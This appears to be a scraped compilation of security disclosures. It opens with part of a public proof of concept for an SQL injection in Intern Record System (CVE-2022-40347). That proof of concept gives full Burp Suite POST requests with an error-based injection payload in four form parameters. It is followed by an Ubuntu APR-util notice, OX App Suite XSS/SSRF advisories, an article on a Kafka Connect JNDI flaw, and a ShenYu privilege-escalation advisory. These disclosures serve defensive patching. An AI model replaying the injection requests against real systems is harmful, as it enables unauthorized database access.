Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&email=&deptType=3&name=

5.  Burpsuite request on 'email' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&deptType=3&name=

6.  Burpsuite request on 'deptType' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 316

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=&deptType=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&name=

7.  Burpsuite request on 'name' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=&deptType=3&name=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

CVE-2022-40347: GitHub - h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated: CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Inje

Ubuntu Security Notice 5870-1 - Ronald Crane discovered that APR-util did not properly handled memory when encoding or decoding certain input data. An attacker could possibly use this issue to cause a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5870-1  
February 14, 2023

APR-util vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

APR-util could be made to crash or run programs as an administrator  
if it received specially crafted input.

Software Description:  
- apr-util: Apache Portable Runtime Utility Library

Details:

Ronald Crane discovered that APR-util did not properly handled memory when  
encoding or decoding certain input data. An attacker could possibly use  
this issue to cause a denial of service, or possibly execute arbitrary  
code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   libaprutil1                     1.6.1-5ubuntu4.22.10.1

Ubuntu 22.04 LTS:  
   libaprutil1                     1.6.1-5ubuntu4.22.04.1

Ubuntu 20.04 LTS:  
   libaprutil1                     1.6.1-4ubuntu2.1

Ubuntu 18.04 LTS:  
   libaprutil1                     1.6.1-2ubuntu0.1

Ubuntu 16.04 ESM:  
   libaprutil1                     1.5.4-1ubuntu0.1~esm2

Ubuntu 14.04 ESM:  
   libaprutil1                     1.5.3-1ubuntu0.1~esm2

After a standard system update you need to restart any application  
using APR-util libraries to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5870-1  
   CVE-2022-25147

Package Information:  
   https://launchpad.net/ubuntu/+source/apr-util/1.6.1-5ubuntu4.22.10.1  
   https://launchpad.net/ubuntu/+source/apr-util/1.6.1-5ubuntu4.22.04.1  
   https://launchpad.net/ubuntu/+source/apr-util/1.6.1-4ubuntu2.1  
   https://launchpad.net/ubuntu/+source/apr-util/1.6.1-2ubuntu0.1

Ubuntu Security Notice USN-5870-1

OX App Suite suffers from cross site scripting and server-side request forgery vulnerabilities.

Internal reference: OXUIB-1795  
Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30  
Discovery date: 2022-07-29  
Solution date: 2022-10-21  
Disclosure date: 2023-02-08  
CVE: CVE-2022-37306  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Details:  
XSS using "upsell" triggers. Non-alphanumeric content can be injected by the user as JS content for the "upsell" module. As a result, the code will be executed during subsequent logins and opening the "Portal" application, enabling a persistent cross-site scripting attack vector.

Risk:  
Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require temporary access to the users account or lure a user to a compromised account. No publicly available exploits are known.

Solution:  
We improved the allow-list sanitizing algorithm to deal with non-alphanumeric code.

---

Internal reference: OXUIB-1933  
Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS))  
Component: frontend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite frontend 7.10.5-rev38, OX App Suite frontend 7.10.6-rev19  
First fixed revision: OX App Suite frontend 7.10.5-rev39, OX App Suite frontend 7.10.6-rev20  
Discovery date: 2022-09-26  
Solution date: 2022-10-21  
Disclosure date: 2023-02-08  
CVE: CVE-2022-43696  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Details:  
XSS using "upsell ads". HTML content can be injected by the user as JS content for the "upsell ads" module. As a result, the code will be executed during subsequent logins and opening the "Portal" application, enabling a persistent cross-site scripting attack vector.

Risk:  
Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require temporary access to the users account or lure a user to a compromised account. No publicly available exploits are known.

Solution:  
We improved the sanitization process for upsell ads.

---

Internal reference: MWB-1784  
Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30  
Discovery date: 2022-08-16  
Solution date: 2022-10-25  
Disclosure date: 2023-02-08  
CVE: CVE-2022-43697  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Details:  
"Tracking" features can be used to inject arbitrary script code. In case activity tracking adapters are enabled but not defined, users can use jslob to define own tracking settings for an account. This allows adding arbitrary values to trigger a specific URL or load a library.

Risk:  
Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require temporary access to the users account or lure a user to a compromised account. No publicly available exploits are known.

Solution:  
We made the related jslob configuration endpoint read-only for users.

---

Internal reference: MWB-1823  
Vulnerability type: CWE-918 (Server-Side Request Forgery (SSRF))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30  
Discovery date: 2022-09-14  
Solution date: 2022-10-24  
Disclosure date: 2023-02-08  
CVE: CVE-2022-43698  
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Details:  
SSRF using POP3 account updates. When changing a valid external POP3 mail account as a user, the operation to update the accounts settings did not consider deny-list values.

Risk:  
Server-initiated requests can be directed to internal resources that are restricted based on deny-list settings. This can be used to determine "internal" addresses and services, depending on measurement and content of error responses. While no data of such services can be exfiltrated, the risk is a violation of perimeter based security policies. No publicly available exploits are known.

Solution:  
We now check compliance with existing deny-list content when updating POP3 mail accounts.

---

Internal reference: MWB-1862  
Vulnerability type: CWE-918 (Server-Side Request Forgery (SSRF))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30  
Discovery date: 2022-10-06  
Solution date: 2022-11-07  
Disclosure date: 2023-02-08  
CVE: CVE-2022-43699  
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Details:  
Mail account discovery can be abused for SSRF. The external E-Mail autodiscovery feature performs connections checks based on the E-Mail addresses host-part. Those do not take existing deny-lists into respect, allowing attackers with access to DNS records of a domain to redirect requests to illegal addresses.

Risk:  
Server-initiated requests can be directed to internal resources that are restricted based on deny-list settings. This can be used to determine "internal" addresses and services, depending on measurement and content of error responses. While no data of such services can be exfiltrated, the risk is a violation of perimeter based security policies. No publicly available exploits are known.

Solution:  
We check for compliance with existing deny-list content when performing mail account autodiscovery.

---

Internal reference: MWB-1882, DOCS-4580  
Vulnerability type: CWE-94 (Improper Control of Generation of Code ('Code Injection'))  
Component: office  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29, OX App Suite office 7.10.5-rev10, OX App Suite office 7.10.6-rev5  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30, OX App Suite office 7.10.5-rev11, OX App Suite office 7.10.6-rev6  
Discovery date: 2022-10-19  
Solution date: 2022-10-21  
Disclosure date: 2023-02-08  
CVE: CVE-2022-42889  
CVSS: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Details:  
Apache Commons Text Update. A critical vulnerability at the Apache Commons Text library has been identified, which is used by OX App Suite and OX Documents. However, our products do not directly use the vulnerable StringSubstitutor class. Based on current knowledge that means our products are not vulnerable.

Risk:  
Remote Code Execution, see CVE-2022-42889. No publicly available exploits are known.

Solution:  
We provided a update for this library to resolve the risk as a precaution, in case custom implementations use the vulnerable class.

OX App Suite Cross Site Scripting / Server-Side Request Forgery

Possible RCE and denial-of-service issue discovered in Kafka Connect

Charlie Osborne 15 February 2023 at 14:01 UTC  
Updated: 15 February 2023 at 16:14 UTC

Possible RCE and denial-of-service issue discovered in Kafka Connect

  

Apache has resolved a vulnerability potentially exploitable to launch remote code execution (RCE) attacks using Kafka Connect.

Announced on February 8, the critical vulnerability is tracked as CVE-2023-25194. It was discovered in Apache Kafka Connect, a free, open source component of Apache Kafka that operates as a central hub for data integration between systems, databases, and key-value stores.

Apache claims that more than 80% of Fortune 100 organizations use the Kafka platform, including approximately seven out of every 10 banks.

Read more of the latest web security vulnerability news

According to Apache’s mailing list note, the security flaw was discovered by bug bounty hunter Jari Jääskelä, who reported the issue via Aiven’s HackerOne bug bounty program.

The vulnerability can only be triggered when there is access to a Kafka Connect worker – a logical work unit component – and the user must also be able to create or modify worker connectors with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol.

**Log4Shell connection**

The vulnerability involves the Lightweight Directory Access Protocol (LDAP) and Java Naming and Directory Interface (JNDI) endpoints, as was the case with ‘Log4Shell’, the landmark vulnerability discovered in ubiquitous Java logging library Apache Log4j in 2021. JNDI is also involved in another, newly disclosed critical vulnerability in Apache Sling JCR Base.

With the Kafka bug, an authenticated attacker could configure a specific connector property via either the Aiven API or the Kafka Connect REST API, forcing a worker to connect to an attacker-controlled LDAP server.

“The server will connect to the attacker’s LDAP server and it deserializes the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka Connect server,” the advisory reads. “Attacker\[s\] can execute commands on the server and access other resources on the network.”

When each prerequisite exists, Apache says it would be possible to perform JNDI requests, potentially leading to the execution of remote code or denial-of-service attacks.

**Disclosure**

The report was first submitted to Aiven via the organization’s bug bounty program on April 4, 2022. Triage took place in May and Jääskelä was awarded a $5,000 reward for their efforts before the issue was fixed and publicly disclosed.

Apache Kafka versions 2.3.0-3.3.2 were impacted, and the vulnerability was fixed in version 3.4.0.

The organization notes that since Kafka 3.0.0, users have been able to specify the connector configuration properties used in the attack chain. A new property has been added that disables problematic login module usage in the SASL JAAS configuration in version 3.4.0, alongside additional security measures.

Apache said: “We advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also, examine connector dependencies for vulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation.”

Jääskelä also submitted a second critical vulnerability report concerning Apache Kafka in the same month.

The Aiven JDBC sink, including the SQLite JDBC driver, could be abused with an unprotected Jolokia bridge to execute RCE on Kafka Connect servers. The bug bounty hunter was awarded $5,000 for this report, and the security issue has since been resolved.

The Daily Swig has reached out to the Apache project and we will update this story as and when we hear back.

YOU MAY ALSO LIKE OAuth ‘masterclass’ crowned top web hacking technique of 2022

Remote code execution flaw patched in Apache Kafka

Improper Privilege Management vulnerability in Apache Software Foundation Apache ShenYu. ShenYu Admin allows low-privilege low-level administrators create users with higher privileges than their own. This issue affects Apache ShenYu: 2.5.0. Upgrade to Apache ShenYu 2.5.1 or apply patch https://github.com/apache/shenyu/pull/3958 https://github.com/apache/shenyu/pull/3958.

**Privilege escalation in Apache ShenYu**

High severity GitHub Reviewed Published Feb 15, 2023 to the GitHub Advisory Database • Updated Feb 15, 2023

GHSA-vf8h-2wwj-jq22: Privilege escalation in Apache ShenYu

Improper Privilege Management vulnerability in Apache Software Foundation Apache ShenYu. ShenYu Admin allows low-privilege low-level administrators create users with higher privileges than their own. This issue affects Apache ShenYu: 2.5.0. Upgrade to Apache ShenYu 2.5.1 or apply patch https://github.com/apache/shenyu/pull/3958 https://github.com/apache/shenyu/pull/3958 .

**Email display mode:**

Modern rendering  
Legacy rendering

Tag

#apache